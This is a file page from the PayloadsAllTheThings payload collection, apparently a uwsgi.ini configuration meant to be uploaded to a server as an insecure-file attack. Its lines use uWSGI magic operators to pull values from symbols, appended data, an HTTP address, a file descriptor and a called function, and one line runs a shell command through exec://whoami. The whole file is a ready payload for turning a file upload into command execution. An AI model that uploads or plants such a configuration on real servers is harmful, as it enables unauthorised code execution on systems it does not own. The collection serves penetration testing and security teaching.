PayloadsAllTheThings/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini

13 lines
352 B
INI
Raw Normal View History

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)